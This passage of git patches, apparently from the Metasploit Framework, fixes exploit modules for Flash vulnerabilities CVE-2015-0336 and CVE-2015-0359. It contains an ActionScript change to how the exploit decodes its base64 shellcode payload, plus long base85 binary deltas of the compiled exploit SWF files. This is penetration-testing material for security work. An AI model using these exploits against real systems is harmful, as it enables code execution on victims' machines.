zo|n7FEe|N)bwk%V!We}+rb{f==N=GIKUZmu?7Q!{(3F#JC)Je!Ou(;r&)vMZ+fxw&
zv?uHt#gFy>0A$a56`=1fh%HyzLiD{?0#8X4wHpukwISDJN7$}~X$@{3Qr--)IYF-p
zzRlsHlyot=Im2##l~bftw6F^UQ!MsF4ECa&s5@~>@^l&E3aTV@fnTkfOa#xSTFJB|
tWQ&GI3DxbGnIu;@#1`0d8HRCBuS-4jE6{t38tV|J^M<sFh5zthSS;Gz@Ld1^

diff --git a/external/source/exploits/CVE-2015-0336/Msf.as b/external/source/exploits/CVE-2015-0336/Msf.as
index bbd0d83034..fee7a99e95 100755
--- a/external/source/exploits/CVE-2015-0336/Msf.as
+++ b/external/source/exploits/CVE-2015-0336/Msf.as
@@ -32,8 +32,11 @@ package
 		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
 		
 		public function Msf()  {
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
 			trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
 			
 			ba.endian = "littleEndian"

From bd1bdf22b54ea3fdae3a5daebb1dd143666444e6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 17:27:20 -0500
Subject: [PATCH 0205/1013] Fix CVE-2015-0359

---
 data/exploits/CVE-2015-0359/msf.swf           | Bin 18109 -> 18236 bytes
 external/source/exploits/CVE-2015-0359/Msf.as |   5 ++++-
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf
index 4befa69648e84694b107659f46cd93a8efa0e9b3..e7244c61f27d7c127efbf8b544cf6428964b6f95 100755
GIT binary patch
delta 18097
zcmV(jK=!}AjRCxl0Sa1IQyd|*001jTu?i#se-eQwyI&HZQG+;r2cGS-v~ViOh8PtC
z1XHud2a$Otrqv2rs-ojbci%O8Dzj}2CXnft_*hV1!=CXxPUm0RE=oxz1F=oBgp^~O
z4YsFapea`eZS2FQd!C>LP7e1{3?(4XCxB4r4aAvQ)MLhwai|jRU%ifFBycMqwmRp8
zf2`S^HeN7u(<62#HBq9ky!4+>8p(R-?GCi^?5Rv!96#@{yU+C27+CSbdF?{ROtjTu
zmU~3P{khAFV@9uHUX{N09DED#wxCOS&8KCPaguQI*mo*<vF3yrYD{eQ6#dfwjcAxl
z>iR)7<Fz=uhFLEtUa@$;OjT{+wq-k!fADTVk4-lT43oAc-70n`w*rl^=3o8}>a1jx
zNaAy{M`gTCY2w}${9_JH^apT1IE7;;nvK{e_}e*JPZ%QQM+QI==i|vOAuU+NJ7=?E
zL%&T<nCur?jAL+}?9`s|sOj9M`h~TJ!?cGU?bv3>tG4_1I8ZcIFj|{Mer>(Xf4q6v
zp7hVWH2AC^8hzFZ=Q||Je4BTdG-G-wGn+DRGI@kB8uSTPmwGIE7eR5-W1`>`ikZ%y
z9V08Q(`w=d0ONQ@+KB3gCvvVKAZH(~YraiQS0gAdLIHRc(&<H4Ab7kLE|LxYflFP+
zL+5p5C4k<(KQ36#)G>~_V!zn|e?R4oVPDWB8=qr1uH+Q?fR>xghdiwz6j%=&A&ylw
zPGSrsr8?vb^D^tBN`f!P)<QSf6?U^bq*kPT)4@>5F!(rBKhpWoLd>M8qp1Uq=q=Qx
zhn5|FPVuDp(*dX|(gRcz&J0?6kb_!fR3@Z7%3asc#BK6)Hqr#12oR@ke@WVRc%;M-
zQ{D>8e4HV>n9HmBkW{@I0K__KXLnvHm44ZF@UGack;aJm*9sZhW0NntE^IVqt-+}<
zRz`ry=`(hItUVU$*<57Sds=J8md?=h7t`VD+~}&C_j9PKplN-5-PJS>`a-3`Vz>WV
zR*8cJz!H5H<QUQtL&?o{e+Na3Q@xJ=)Ouz4Wi<`-22D^8)Iok+Vl4b+0i&H&BI?6D
zjOk&9VQ+U>t{!rB`3YCb@H+{hD*v@K-v-eGE6cNpy51~+B*~R@-mN(j73ZQUv6|-*
z0!LxHi=GW(GWInexmclx$^_GqV5q*qF_wdNMI1XPTM0P}`{bw4e}`vIt5}qqrum%)
z{pAxTM*A%>FD28r$`2m<c!HMuylz$&Ex9=;j8V7d1hn6Ra<kpc&S+V@x$*Q{O(mRz
z>$M1UcN7_p*Qht9_1X*xNR!^fQ)i^`qEee4D%Dyk0k*z^$G?g?&0lg(2<;ob{Wy{o
zE-`YK-l4d0li@GKe^MR7u>UC;4YxOlwbjR|GXih6s`Ki0QkNHu4P>b;IhhVT)DHm8
zH$q^MZDL>a<JtAm8xdA{8@YAt-Iu5$59|f3oyWAAEQ3yB51-kL%HZ}OY9_y(&2W<%
zT(Oz_TpnDMiIrNHniXkRJt@hagIS>8W;j2g&eN%lEz$Rtf6L!6AK-xQHw&;uRE!{T
zE!z>hx7l3LMPz6C`$D`_Xth|)1e4q1Wb_7oa{a{jw*|U&rQfSZ%~zg4u2a$xe1#03
zFD9d<xbHD@Gycl&HfF3KF!fPc1@!48zkUj^r|-79f(+!wP)0L=d@q>8!cz)6vFqEY
z8EgMb7F4`bf2!FhT~v_Yr4e=CiCYUq2k)mn!@zXcL2TB6_<eUbS>Soq!*akw<w6%D
zClAA<l5tw{K;}}M;Ee=_46}#(xVeKpt7K-<`Q**6VGp{FGc>$fw?hLOm`lDrN6hQ~
zFV!-6!gePq9noSAazh_WpkeKt7d_fC2MQ8<wpQI#e^%E9QOksNr8H^<uNX0Q$q@7{
z^&$N&XI8|l7!7wIq@iAsP2+2n0Wv7R40~%G%M+^l!O|JaOA_a350kjLUIxU#C6orD
z8pI%d0<Belo4gGsC@AgeN)(ev_wm=+B4bgvfaPea1T%Jq#BwJMAxH^o`c-;<D##w;
zTjtjPe<Y+rV@`M$&oGIVNp#2FyNQs~AVrAp<38x6h|8>*2~@gKz^s*oRAX6pzGtM8
z1F=E`wlO<#mid+vJ?W*R^F+>y(7l-7>xcoURxwBtxbcTnLytsbWMmeQVdAaJbtUaU
zuJ+bU*eZA3<C@9>*kbr}r5)Y)EX|PiXwO>If04G9byJ99g4m*_{V3gF043Ccjp=`U
zEpInhH?bY4K}$`*85A>sj@W!K+}gpGweD@(Kacf--5zHn@lO@t#9NLy_iHQM>B!v_
zw(y#}WM+%k%s%5$m0o)YZS}01$IKRnJK9v$TO`y+x4$+jn*F003>cYtISBpygZ8VX
zf8y0Ngjr0Ld^%>77o#yVigO(I=;lJ)^*&2Z$u1E|F(Xylj8gj~Ew7Nh>ZWW5ab;P{
za{$o`iY~z8;I6P1d2CAn2ot%y`DB-qej754+Rs`fhDWha1sq$*_@jyo$f0`k(E}Y=
zV7*j|3Xiy%{(P;;1hTqGmPzB&`~bULe;8^cD>)c6CH5f>cA^ZL@PV*K5`_udHP|Fc
zRm{doOP?Vn9$|Su5r4)AO<;j{7IfTdVoRdr7KDr!fMzyA+h|^LR`c*=m#sCam_2bB
z)ux13Dx@ih-Fi=a%!zq!Ze(yR`<jUs0<ymL1tY`D_UZ;HPOR-V0>>Zug2|8Zf4g#1
z8}0+9vHZMM09dY<SstljIND1mHk9LmD>4@{?ar4`^M+D{v%jrx+-TcGv!&Qd_EVqQ
z?i4JL)PKbPg}lZivI7SdFK|^to&H8$8_11o(2M0=t}f6xl|1jxFzBwjOY_(EH@dV&
z5i1Gxzl)~q)caH2J<Ra_<$>yZf8YlB-lHiPBL4kmQ$p_dIgrl<i4901lSAA~u)H{Q
z%wj5G&_jUH_@0w6wrV9~@x!tO(QW3Jyb|;^atidq;-~l;*TJ!3_r#*K9KXmJH9;lE
zJ9cIoe%sUtYJV<wZSK<t_?MbZ?^MNF3t#X8lg8ygI{pMcLYa*%RNP<pf2`!Dd_9nE
zNp}xp0`eEG=i3zNG)X!JyeG}$4nxgwVrBIrr)N8!1zG2nbEfmdbK#q+lGSrQFR7rX
z!?-!6ns%O?E+fl{6dvaOeA)(=6~*C&DflHv>b(O1ZxDE%D}BM;KJxUknpBUqm@xZT
z3@88`Wn7quV|-U`9+E16e~_Rm6Js5~Qgyr#-mgvs&jtSK>8cc#Vo{vfsL*|uQ*RQJ
z6I3~H?9G9p>_R*#li~Q~%^CQ~S<wddckXrOQq{fzZ)-=F;apCFhrKSd$7~8N{V=$O
zrcxVu>q~j?uDNF&<rlQF$bv?Y3Dk5w>GG-#x@ne;@`|KVPa6DbfAfFjq>A(<VdU&<
zw)UWkek};fq|_`|jli{XIfiT6_qFUnQ$&`xNnF@3+4p=%$qFbHFoIx0uz*n5qj1#q
z4A<D8w2f3gZ(Hn0hHM8<OFHxK`K0(kB85)jzda%mGm?mjUR(v{sU(WlY822Q?C$-S
z`02n8j$xsw1uFjFe}Gz#Rw@}SETY@Wl!4OT$gp|Qd4LIhMJ%&c^N##SZL0IZTdND*
z33|2MKci^mTcKXd{@_NyKt$K0u8d&`84V_dpzjM8;A^@7igTP`d0)#rw6P9z_aPTS
zQ77k>%w03L5b1wtGA6Sqfsf-C{I9d+H@R>f{B%1&thNKse^n$x_k*;-i;N@R2It8?
z(ZW%6LnaQ?6hob_$9M6nWyD!vF7Q$kd3r*}eFN}WbE&m7k05<DY~y71sBkzVePmFD
z^Lwjbqg#WS;Ue`Y$oO+=2oP3WSGo;Zg<u4pcF*>H5}oB68JG_HbRj&YV2ZjFz!(}O
z{!m{igtCySe^LeMlrDT;LT9x43Iv9=NB&)KntujRRzD82Nd$PfMxWY<YBbpT%3t8d
zRp9JxfzQ6vFqlJnNz^d1S&Ro9itje2&3E_3OGEkKMf3n{RoZW?HUaH4gCz@~2{$T<
zVfF=bQ*(E;-4LF3e&O%!*5?_H=<{&98!;_Nc~}2Be_?<F$|lzd<nBs`kWRfl{QP~h
z7-E#iUUE9bpMLS1ieD_0kH-V)&U;KSWG(JaJ%`{XS_G#g!<h)RBYEZhv7z<e>116Q
z(i!z8A<l)({3s06EFoUpX1OD8q*TPXH&O{K_!|X@cdL0pTncmG!bQb$hQqQ>VsN3)
zB3)b)f5g8!c&nPGLz7qI1UQx9PZSem@@qPXTRC=u86w6X-DKZnA2Fi!e7Y!!t_~oP
z2Q(%n4kRnsf~IQ^g0I6>|5@wfD^nft44QP}k<~1~5yCuf(a?E^njG6hk{=`dN7hP!
zdJA=$VbS8F^cF@yuh~u-MpnrD)XRYL9hQ3se|=hy>Ct$elBJH(T(*_v#{}jh%bVl!
zf*w>mGh_DxCNbS&Ac3hQ<8$Kr$gLD@6S1=n3RZw0Gu2HPp0g|v6?<(ut8H!hBxOES
z<8ceK9to^d&r%<f@u6MdvZuMY5WhChelu?%{;E(afZ${<+=KH5!8uVJGd52fUaLql
ze+Cu!7;q)9=SGHk>OwJ52#W2yC|kI;D*SRxh+`?R`j<`78IdjRJtRo5+qjjBbO%x9
zrQv<wA3P{b?%eM~7A>XQq&&6ZS=vFSQ<>v{l$%PK9gm6xJCVKFykvw@>bvC|vlHtU
zA}D&8%QXZ0V&K0OzOV=VOL++vb#US7e+GMO8`GZMKjq*sZNc;{wOG#kD4P|d{HLL0
zWjNg=({I<AhXR9oJ{gU64WovlTVw_YLzCYg^#o=HD#hfpklL<j45)}+MTDJM3tCeZ
z-Iw>otw|BnseZO99W^;;^As4_jr;BL9+a<}(^%$tN4n&8-?>Gvp<W}9I9m3-f5gH2
zq(3KTH&t9aX~>Fz97s#--Y;pW<1J%Tik6nK5b}{eZBPVmY=;D?h#iM%<DJc0G7wA`
z1v@PpfSZStBg<7eZF(m@k_A>P3dNbnK?&mcuO}O~{{RMjEJmRe3@0TA0a-lmwZK4L
zH#6&7;&uSRKB;iIBD<m9A5XEcf1DfcxGgAap*)T5>Cea`DeQ0Xo_3_Jn^{lA1+UiD
zr>Fuo;4Wi_?F4pISta|P+cg1BGN%`eZ6}JOWDK8ADuDFl6xTq<2?TD^GqS9NP3|j3
zge?T(-gNq)*dfiIx~@#pYdg2D-;6qq!Zt96d$&<njHMbpN95)$xwF}Hf5N32FF?`?
zfl481`MqA!&#$-f?B4X}<v_Lbb9iQfYNI*bH*n%6n*7s$f0$D4D0kz+?;?^wI!`hP
z(wlXt8)IFtF|Cot$IzskOFICugR-QLA1262->2H6bC>)u7^$3549uA}um_sOluno6
zdYp+KSHm`EBAZ#bAX>1Se<3t&=>JT|{P>{q_-5(GPf_`|UG$$YR$23%OA}KiZ11b4
zVp;gjm*Q5$B0q+G{^o>Hyo*|a8(af*7vz`B${+U$n81xuCIXcR?$9Y5DC~vzo#|Qp
zFD^CU4yU&K+$6yYIq%xz+>H6dg*jG^UkBioxJ!lLM*JV*o*aQ3f9|wbr%pQ)JOW8%
zLvJf}+8W~G^L*md$Vu3dM{#cd?e>b7YnkNzq`LJbP6zZ2SoWT==9%E%+*`k=$1t0@
zsVeo40=XM=-Zsla@jJ2=Z=j$OREEBH*GjIcHO2M4iMjhoJ%Vq#EZo`qLpE_71XAne
zGxWVTv1ssHK<H~te=rsWoE1i@iiQlDW~`eQYzAh`kvuid1rTVt8T&V{TM1wnUVg~C
zuWlq!l(g3QXveqZjAIN;u*6?^_HL*cuab}4?85gI5tZwmm%s>}e<&tp&*smyrodu`
zSj@G7jBsy$q86t0dk^eBt}-<>p=HCS??ArP(AvfX%^hz|e?QQP?TPf{H}T#oSjvHq
zGQ`1by@@2(+@nvnUSy~Of6F=-F7nVIJ|m~d43DIh#}arvd&>T|p(!*qD<*ZiddkoK
z$v21%+?lu%FlNIgqOs1~JPV=9-J&qZJc-Oy4H&@B#D^j@O3m7l(H$$W|2CrIu8Z9j
zBshoc_SD{Rf6`q0VRgFq=d~w#P`c?7kID-XLzIvgB-AJFuX0*PjviEBm>2H77de4X
z(2S3`E;^+b8!bt8T=sU#i|OM4?5&B`M8B~{V~fqFFPWjdC}56Rs^$%z=&V_}i}I-a
zCCRflGMNI1ObnpFF@<M3vlNze(6L4J9S=zIXl~j#f3y!&Zy4x-B&1Y7LilLr_zGU>
z+A8uAfIsfp0XaFi4%sHs0FUXGadLuN<4c~d&+ec7ER?Y)orPQ|5}AM>;tvo^0)sTk
zSF>>NmYg%yoe%;cYIg0YNCddoH-(VB*VFVcS?~^vYh3_gI){cv#hFMXIn%DgM`V`}
zLv#Qme?D;{E*t(kGrit+H3ZA^9k%L_C6N!_6~(;FuqOIEtn2&-cEDlEDvB~xfH|U;
zdvwGbHY>y73G_7;r4n?ZG@syqh?GhmpnnD^))wjHHn{_7epYDrR*<i=%ZjO1x_O(R
z(u3yA5^9R6Fb-4he9iuGqtfU)IisbYPo}cKf9#ibr|)Y3Y?Spdp3Sx!4N|@vI%L-q
zdd>I=I`S}F%g0WSbRQOEAT&%EJazS@`Ysm&0XR@i`;BtJ(TGkTw<Nn|?z^n2zqSvE
z&}CGC+);TiaIeblPj!W8m|bXcX8j+<cm?O!oWFbfZST2p1ZfU*caa2eLRU+IOg6_=
zf3#{C+AhZ*`!Jb5YP<uB5#xa=SQ<asD6ex`kn<v$r7H#YVqhM+DXFmoT9jY)N#}Q$
z2cVQCPtN7odx-5ZEeROatzX9vMBnyYZe|{T#O?i}19Ret@=SiOb1Y_a<S4)Pk2DW@
ztmciuoXLwl^1d&T)`;gkXwW_LuM#5hf0fKR&mk;`5l%TUoNK7<>4J)51kZ<OcqYPz
z>?+e5OES{w6`L%}&^cxt!C|&l8$cfw;bNyW5Y2=ur4zk5a-D!tyXo@ZF6hJ$Gn3v}
zKP6}WD(!n>))sj=Po}4)o8897SdbtCQA@Mqz-2~WXlM(<AMRg>D_-Yp|6h=*e`4vj
zO46FITCIREcE)BNQY2up5bSLSDjgBw-h+eab0OKRjkdP`gFLMFi@ebXi#J!X$#c7R
z{12~UWAg=#VW%`AqHA_Y1i!*tviqG8`l^PvkKyg<xFzSH#tI0zg|stDc+%nLvDsXt
z#mj1|EGsM%2xok!<rITvS8UQ>e~Qd@ac$ELLXL7L{0&R*z&&;R)Zld+bt>hTHR8;<
zNQ1fb#Rb-#Z`Hy;R2U}(w-n_8<K?SL3J$t1E{oMIXSKwgZ*!2RMs!vFM@Hj!M7KX6
zASo(ZNbI9jLrPWpbm*@f@Uaq!O|A5P>r`jxI!R|)QJQ+9DtE?Q58)6oe^#@lee=~{
z$dVI7u$pu_E$0sntsZC(=Q^t4Ohn)s46%>gPm@lClQ@iZUvJAca>5A#@49>5>=cA$
zP$)9@J%U65IT`;_*S43i!y8A~M-7w;YFW}Ub=HKg9j(us&?T1aG2jm5#%W={EgpOK
zAZ=SU`!%bwV(Uj?1C|fIe|*P%|EmW*hEhvfdn8MNJu77NX2qa9yd{u8=OtTktQQyL
zGQCEKBMPht@5Me&1%xsuwg_S|09np0R}jGUnLlh$nf(IL-i=>$!OXFoM|9UqpcD$D
z$c22FYVPSttV#y@ZWqM|vq`D>BlL<U@Rf@$p?tcI;UAgM#gCYye>VcA84sf-{LADw
zUK*hR(^jhl5o}FK$)4rl|9Df*k&1NOy8t#%@57&1l@Jt$CX*#BIibxK;%F1wLs=BP
zcCRl~oFQ1LSIBgJF^9JGlNz|l^!NPtM13UdcDtC8Kc-G)fWMCRl7t`wVCWP@u`PW9
zB#b$upz)qBhC(ypf7sUFvQ=$s&eb@>RnZH8g5Zdkqgw^-Xv;*wY>m3!$wJ14Nf*PJ
zyCuExj1LV%OM4d(PB3egr{XZ45vaj}^JWfivj{LF9Nm(F$%)I>Mja2geFNeh{C$A^
z>lI<!6HIZ1P51vcr>DgBt6gM{nn7iF5!m=?$5e-2Nx?;Le-<?Aupf_VtUhK1(4*q5
zRDFm3!$b9JQgSAmZHa^Z<k^O1Oh3Q6l{>T}M?yt<XKi}MChLKq$(rDyXlO@S*v4#!
zj!q)~v<my^FrpbIgP&8}{Afo;l#rw%axj<ku+Gut5K_h(Zg=38IclWne*<YD3z<zH
z&Dun>dkV-!f5hPCY4jM<<yXdKQ7*LvRIaCqcXB@e{AQ*5Ujue!kwR;hC$e4|`oNhU
z%b>CzX}h2Jkn@l(L=pf|^`2dNZ{bX0U=)jsd~&m)S%mw0SiN7GUdp_xDIFe1LYrdQ
zMsu~R=Ku6jMM94Q?}0p^uGccf4DGoj9QwVLNsv9fe*u6{k|Y`(m%oySi8kLN1%$=^
z*lf|Q9^ACecPZg<H@N7(<);Y|Qo}a^_hvj`qev5DS24dL?kN5A=L#zmPELozxnNt>
z@4;I2plX-$G<V7g5yiSm3(|Pl#Xw35n>m7=UxdPl+dtBMYIHDFSz;R?L5k>$`C+CG
z)5B?-e?!NS_6UlXn<(d+KNSk>**!*woUQVsY9_vR>}0#5yP<>BNY;Bw+O=c==PDSU
z&?l{#JUOesY*wB2j&Grs2f)cgLQ>4G;}<de)wRW(zH;AQkRqi)a;V%$RFX8p_@C-1
zKS`LGNaY5fs^Z}OQ5_apTxKGe6>`>A|0V#3f5ZB+U0=Cls<mZZ0gkKLvPUUh@IkZ_
zj`Guwuw_4y>45jc%*w}X(AjcM9g@Bp1zyxusSC6iB7Ag~rl3&pGBwgOo$MY4BDq=@
zU&V`&0kzPrF<BTuUo!(J=TWGo_IN2&htvZ;O%4Aa*ddoXKP9M^AP!6=GSI^JAa|jU
ze`Z|WKj$}<`nZ)N8?lIN^7MsWYSf@0j}kvQLF16b6<b<4*kcu}oxWC_`sDNlPl|`>
z)V1lMYuSXgNrj^y5Zv6Zv?)ZRq0?Skf5E7$zZbdT=b*M2Lewbj^C_+!<gua7v&C_p
zx}kum(83J!5)@bLzUhq3%mL#qD#pMIf6ca5FtngN5|B}yDkm1YwP+{C*Vo-mI^Kg%
zCLDGv^**h0035FVlX1)dR~-Sut7b3Wy@yOHa&QHye|sm40t-{7L_I5gZKMDL-J0YA
zTH-+dO};eW<9$x4J&F&itT5NgF|AVCPKZv6?vU+AtUPcTm2I->(uc{#6g2Cle}fUd
z>S=zy^UV3>mNhM2yrP8NjRcUwihNAb1$}+2Wp*iZzxR|ehj1uHXcQ~O{Q}g!Nr-xM
z;=ICT<hO7ff9<0I{y}jWX9IS%m@5Aw;K9AcycDTu-Tx^(&na-F>q|*Evy(w|hT{u?
zK6k!V5eO(2<mOO@1bvps)t(uYe{LCK;Fd7+LzY{r^cahaPQh`T{iasRK$bo_n@Rb1
z`hJ6iI_U^8yjq81kM=M)hSameL;+73Hu7q-5=vJO3XtELZU9ULi;!?LQC|8u^Q0T1
z-F{#kHycmsw<_SEN=fS)(QKg#{)@m*?zj6A#Wkb|#nXNK+tIX4@CEKrf65Gxrk`k+
zSJL<XnK(_#h3IMkaF&&l_vp!<7r0qpFdHgUK}=fOBx>wkldlLBf7gH?0-PI%I`vB`
zz9A5V11moXRT7FoPSFa$-<^Ge<VhFEx5pdiocZb5J1ddFOl}6L)!WG?{(>0u8{k7G
zTEV78HIIu)P%%6v8bMlWf6-`VQH)r|S&7glBNf*AJhNneRp@s}&hBA=M(>pE1yDJ5
z5WT|YDFh#f5;V&Tnshpp1JN0@n*@fG>FQa*2YbQ10-TNB9k#_jIe(H|N?Lwr0(0U&
zEzVM#xhr&INWTJ?MDAJkkukYoqK{y`lS;Io-7A+V>rMIvMdj*de~hau6z6bL!4Kj`
zD3g{h%}Bz)JG|(>+N21dmwc;9p)M0x0`3hk@D-e(SUUz@pa4S@ng0!CH06C1HS!1>
zAkUt*oKm(kBQKH44cb7uUMV~fi+e$h-jM#*#Z|xy0$Xb>;@9Fhu=H#ppn|FmBx$q%
zVf10yWDvCwN1YiTe;I~zdsW_IRQzmB(Db_yHdTSm!R;!+cc|L~TL7{av@BXV9*(o3
zpq`;<A~zc7zV7PPJ$f~?J8>=k4oP4BntwHBic?o<z#iCm%m-i~JhU!)QAnao0LDjf
zBpB=+-zR`I8@G0OYtEUKP7ax*?c1pH)hc%b^N(%<qb%C^f3LDu*=DL8@J=5<h_OYP
zEaDgFwCblJH3s9+6l>M*{2Qap>_PD-(DR@r3ml*P|J2a*5U6=0ljm{2y{QKCaG6q~
zA!~FSAyzl#^5N)CES>h))Sz+($H(>q+aBg`vcyOZwk%z4C_Yw7Rpc8fa@)vay2ae%
z9FVu{)YC*kf3$07h-)Z}29%a!+{PAmT7$>&5vE{7l}yn`;Tz2!vT?;u3sc@#9!P-v
zS;*e}k)h9-{E37BU8s$Glvh6W3}V{SnhVjS!U~&Uc-7i#?t&1FMS5XJl;i>iyZAb{
zl=RMhQH`8#&>xe=M&bt02vyZQAH~|4oTu$B#}3==f9M0%ZB53j9W-X9-b8XpJwF=}
zJ!v{2UQ|}i2g+c>FbVYZe{X`7730l-!J<Lwi5XS`yIdAfuC}B_VnHmC*gnENlTT=z
zQ>NfLY?9j=q|_KcX0#UHE%_)Y`YJaEP6#(rd8ikaAyyeFEJId92JKgFP95%oJfuO7
zn13>ve~s0JtMBrO5c5g{gY)Rq{>G>=iRQFe$ZE3`Qv&@!2LO~Ej*4Jid(Z-%%K?a)
znNw=6p3Ae(>?%y9b2U%-|IlA^{p7CZ>cQ!zy}jqsa1o%|NPGI21($En086j$?>n%h
zC!6WUa50oU;}XIU!tG__ZXCp1yz<VozFx0SfA4wG9UPC!%5wxho#rZeq276eKjRK6
z%Ejpi%j5^t@2+fCe3SBf*KZ*$1_2O`_;t)y!pvpF&7t6hL1=x(V<*9?4Wc+(+)kp#
z?A%}3r;ojLo?pHufTKmQ@7M*~4Soo0xX*(LxL6JEQEopN3?x(^!jZi)y$1m*P6x;A
ze+q@1^oNqS(asZplqC4AJbUB%mUAOMp>lx4i4d3*Qj!>r50|y7Dfg{p$+y}4(zd3>
zAQD~?ic(0HQ|PgP`KrOA0G9lZ{;zxy5a^A6U|;Fm5ytE-YD);)Z=m_b#nPA^c;}X$
z&FoU1$+~PpsSEo3VLL1nIgbJNV0F%{e=pBFJu8Jgc~4*!qTriYUTGPX>xw`4v`+!^
zy8&F?>O??|#m$<A>LOgR09J6_dUQzIf*6=}$qx0^zta6HRPyMX5#gOSF^5^Ea8`2K
zC^bA$)e(-{Mc>-isQkUbf+?I!9{iM|z3wtxJVsj;O@a)%FYzc&4L#tw2P!YTf2+V?
zS2LS}@yL&oNZAErH0mq*8CX_`QQK^BtV@VRY>f-$7^uq|`t|$W3~qa7?zuP-;#A>*
zF#&6!U0y}YVUWGc0b-kAvd#-0;$1uKi2U0B6!g@+Ll_Qy#Z!UY&**bv(nnhpP14|N
zw2G*IBBuw+qzr?#dce#%i)AYae@@=*DVx_*R*8SnFGdZ*Hhl@KvUjyDog7&G8ekRG
ze_qJfX?v}2^jzG-4f<QFn6Rae_~m+K>5WJh-T#@bD-n_mv&Nd{gT^8_^UPN=W)om_
zX)vA(fkQ8XU8LK^C47vaz};r8@$`ezIPDxt?;co&h<Z+-mB(NNp$NQ<e~MKJ#|pVy
zX5T()l?UlHuWr%$8pHuabT4AW;Wx9+wv{i#$18-?6A2|?r4uuEqbOvCPUIqi2;F9{
zqi7q=lS`ap2VyGwlJ53t>tA6~Z5qRb!QpNqT???CAv)<_{6$RUMtsR)<kKp78c5|}
z`_rc_<ze2WIZ9^<yd<J#e=$K75n#>^rd-fDKeXD&m2(OVT}oAMV2!M&(@P$HtZtN7
zD&O>-sDA*jLhpHTk9CA7#xQ}T+vHKWRCBJO9W#nXn?+Hx;|Es$wYUW?Y9o=+59+`e
z!dpR*aI^p9BRkp@0!folq}ofWM8lLeIhFF%GXJLR(0i3;a2d&te`UsSwTO!SKm>mw
z1<v!xBSDz|B4+Z`AZ}?Oz8&>d?~t+*_vk|b%Zz)fXeiy>Y{X)c<BdFx!x*4}Zo5YW
zB&kpSYh=w;GDfgb8vKqj%$O~W7f(9zWi@7Fca${jvnQn7i>0wCY;<qIA1$`;t;E}!
z?hQ<o6prsol1rO8e**f(j@JXVz`vT9fgIBQ#|fN`=sHcw1Gjx4e@+>glITo|M|3u%
zuefbUpB1&3f#6?cF$xAYxY+wRyTNqn8}>}IUPWiW>mFC)YZ;XAvqyC$>&q)!dQST;
z#;R8XGApb)=;lo%Iudeh7@b_raOe0KtGR*c6s{*HX!|!{f5rTv5n*~C-xV4mwk9)C
zD-3)M#=n^!EEq9ZNg4*{#_w}JUL-N+rLsAXzT29a_7ug)4pGD3N7CU$*~xF9#PcfO
zP?%r-fn{pmkzMLd+5SeHB5eZUHw4V~3vbJ!qrgdGCk-e|4a@D|j!f=cj^58m3g~)W
z&RXcU_1_Ute?KFG;`CmQX*oz{5{S?ZEeX2_C)=;=F1z=vv;5wW?(s1=j~vPa@OA=7
z-)x02sSymPqC&U@>3y9906b$+hygkYia7*zx8;%zbO=MpUcIMS(sDnRvy6}U%}70_
z;~jDqLu3}~6=r7FWT!Z#PLs7{t`44`Bi-dv<fyQXe+OKVgSPmj3o!f|Z#%IEVb9Xk
zPBRVG7J+%&({Jo^%0U|4=~?zV8s0+n+jzre;FZVkt9@BN6E>E<N#NP|#2*M~7i)_+
z^S_JMmCy141q!77^D%x;;5221p<WI4JUQV$7oZUWd1T0hHG8u4^(WWYm6)mMD!EDo
zx~sfme<3^;NJqIrh9YL`aB31EO*Z{RK?-MWQa9E&S2yJ<`Zu6)&?8vhv=In)btX5t
zUpfa;AeDXN)W?HH)^O1n?x=rviT}?Zcs9%z|2q!-l3IppKV>EEmrk|N`&D3gtPy-^
znl#p8{01*l*48*!U>4F`<w8d861Id<+b_*je<Jo&e423jc60=yq;>UDr8F6^UY5(}
zPE;wVVT{)hP>P}3t({{0ir%-abepCekZL`%q5yAMeukO&kPcCA1uyOCP8uMGthnD~
zr9B|{xQ0cKNpuY>=f>r(8L-Wui(h#?Z|*oDK@H;*e}jJ`_u}&UfthHBu$(7%cw7TR
zf0#(Mc^?i)m(r9Id#{vIsA!wEzY*1inQQVYySn$2{cRtvfN#%DC4yq)ntCUa>eY>;
za)9zqCnUl%&XR}cY}p_7iy1N_F}rTTNJdp{fA2R6&sZalyVXE9wJ7f4g84;MQhr_C
z9AKv610^lo+O)G$pN|6rB#}2Uz1f}Ve|adn(?Rf}K~n?!{@bIe_MzK-I&^&@v@e|s
zY~3nbF}Bd~lsu}vR{|mU-*+N;;<`$jAxwc33Q5SbYv6ty+7u;otoQfgJd#kL%?UEB
zBX|}Iu*if(O3sobEn7eMHHw4C)Mk)ybL@U=EM1Q}<$ar#p_oEQG&@!?Vmv=oe<00+
zC-^8Sd?LYxL3Y?0&H<1;Rg9?i!o=azCO9nl4DOjx(k-NmOUjfXa;B15sB>Go$RU*q
z39e2#x@9@|^03$atOYwiZtL!W`Q2n2h&6o>&6?b+X-g5S6>@u3wjo~WEuj(`r<F^i
zX*Lh*;a;?VRi2Z<XUbrj?P{>Of7teuKI)@OxZ{){r8KZWaM0Tl-M(eF6r4?(C}XR?
zAVQSd14=FH?&bruG=y#$sDt}_&}z~aMuHluKKWWq59`NF#43;QriI2!$FUz&P-NqY
z-Xs6=u-Z9b1V&!gKFqCmANVk+=PmgSB-99xiLr08?7a;{I4j61a2j&be`eT+oFUto
zYGR>$D(ZveOicbx_r2qS-u8ElD6-CuQ$<?N*RxLxst>7I68<r`Z_r8NBqK7=SAj@y
zxd|wBpyaT(7z!bK6Pmkf$U7AW;~%(-AI#JRj=ZfLLKlojC1m^;m-B!f(47HMeB4<<
zlv<TtNdsPf?=*3MzUXxmf6GyvJ9NYVc4{hS4zK_*B4xlW%FoC<VfxQIVUA4?qff$l
zBQydJN=8%(x;e+<c>$k$zcKYa-O{{t`znd3&3W#A+%R1R!mf?~1ROism1c;hf$1xY
z4m(=RLdb=Hy_fT?p7ZHi<eQj*)>--NJ`e&Ovomi_KF0P2Ps0^Be_~__C00e#xIj_W
